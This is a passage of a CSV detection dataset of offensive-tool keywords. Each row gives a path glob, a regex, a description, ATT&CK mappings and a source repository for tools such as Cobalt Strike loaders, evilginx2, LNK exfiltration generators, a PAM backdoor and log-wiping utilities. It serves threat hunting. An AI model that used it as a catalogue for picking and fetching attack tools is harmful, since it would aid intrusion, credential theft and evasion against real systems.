Privilege Escalation Awesome Scripts 
SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/linpeas.txt*",".{0,1000}\/linpeas\.txt.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/linpeasBaseBuilder.py*",".{0,1000}\/linpeasBaseBuilder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/linpeasBuilder.py*",".{0,1000}\/linpeasBuilder\.py.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/linux_ldso_dynamic.c*",".{0,1000}\/linux_ldso_dynamic\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/linux_ldso_hwcap.c*",".{0,1000}\/linux_ldso_hwcap\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/linux_ldso_hwcap_64.c*",".{0,1000}\/linux_ldso_hwcap_64\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/linux_offset2lib.c*",".{0,1000}\/linux_offset2lib\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/linux_stealth.py*",".{0,1000}\/linux_stealth\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/linux-pam-backdoor.git*",".{0,1000}\/linux\-pam\-backdoor\.git.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","N/A","10","3","294","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z" "*/linux-smart-enumeration.git*",".{0,1000}\/linux\-smart\-enumeration\.git.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*/linWinPwn*",".{0,1000}\/linWinPwn.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/listProxyPool?k=*",".{0,1000}\/listProxyPool\?k\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to 
create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/llmnr-resolve.nse*",".{0,1000}\/llmnr\-resolve\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/lltd-discovery.nse*",".{0,1000}\/lltd\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/lnk2pwn.git*",".{0,1000}\/lnk2pwn\.git.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*/lnk2pwn-1.0.0.zip*",".{0,1000}\/lnk2pwn\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" 
"*/lnkbomb.git*",".{0,1000}\/lnkbomb\.git.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*/lnkbomb.py*",".{0,1000}\/lnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*/LNKUp.git*",".{0,1000}\/LNKUp\.git.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*/LNKUp/generate.py*",".{0,1000}\/LNKUp\/generate\.py.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*/load-assembly.py*",".{0,1000}\/load\-assembly\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/LoadDllRemote.cs*",".{0,1000}\/LoadDllRemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/loader/bypass.c",".{0,1000}\/loader\/bypass\.c","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/loader/bypass.h",".{0,1000}\/loader\/bypass\.h","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*/loader/x64/Release/loader.exe*",".{0,1000}\/loader\/x64\/Release\/loader\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*/loadercrypt_*.php*",".{0,1000}\/loadercrypt_.{0,1000}\.php.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/local_execution_linux.exe*",".{0,1000}\/local_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/local_exploit_suggester*",".{0,1000}\/local_exploit_suggester.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*/local_map.exe*",".{0,1000}\/local_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - 
T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/local_thread_hijacking.exe*",".{0,1000}\/local_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/LocalAdminSharp.git*",".{0,1000}\/LocalAdminSharp\.git.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*/LocalAdminSharp.sln*",".{0,1000}\/LocalAdminSharp\.sln.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*/local-exploits/master/CVE*",".{0,1000}\/local\-exploits\/master\/CVE.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" 
"*/LocalPotato.git*",".{0,1000}\/LocalPotato\.git.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*/LocalPrivEsc/*",".{0,1000}\/LocalPrivEsc\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*/localroot/2.6.x/elflbl*",".{0,1000}\/localroot\/2\.6\.x\/elflbl.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/localroot/2.6.x/h00lyshit*",".{0,1000}\/localroot\/2\.6\.x\/h00lyshit.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/LocalShellExtParse.git*",".{0,1000}\/LocalShellExtParse\.git.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. 
Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*/LocalShellExtParse.py*",".{0,1000}\/LocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*/LockLess.exe*",".{0,1000}\/LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Locksmith.git*",".{0,1000}\/Locksmith\.git.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","7","685","65","2024-04-23T15:48:48Z","2022-04-28T01:37:32Z" 
"*/log_file_timestamps.json*",".{0,1000}\/log_file_timestamps\.json.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*/log4shell.py*",".{0,1000}\/log4shell\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/login/e1837f4d-1d0c-49b8-a242-8f653226c137*",".{0,1000}\/login\/e1837f4d\-1d0c\-49b8\-a242\-8f653226c137.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*/login_scanner*",".{0,1000}\/login_scanner.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/loginAAD.ps1*",".{0,1000}\/loginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*/login-securite/DonPAPI*",".{0,1000}\/login\-securite\/DonPAPI.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/logon_backdoor.git*",".{0,1000}\/logon_backdoor\.git.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*/logs/*/becon_*.log",".{0,1000}\/logs\/.{0,1000}\/becon_.{0,1000}\.log","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","150","40","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z" "*/logs/beacon_log*",".{0,1000}\/logs\/beacon_log.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/lolbin.exe*",".{0,1000}\/lolbin\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*/LOLSpoof.git*",".{0,1000}\/LOLSpoof\.git.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*/LOLSpoof.nim*",".{0,1000}\/LOLSpoof\.nim.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense 
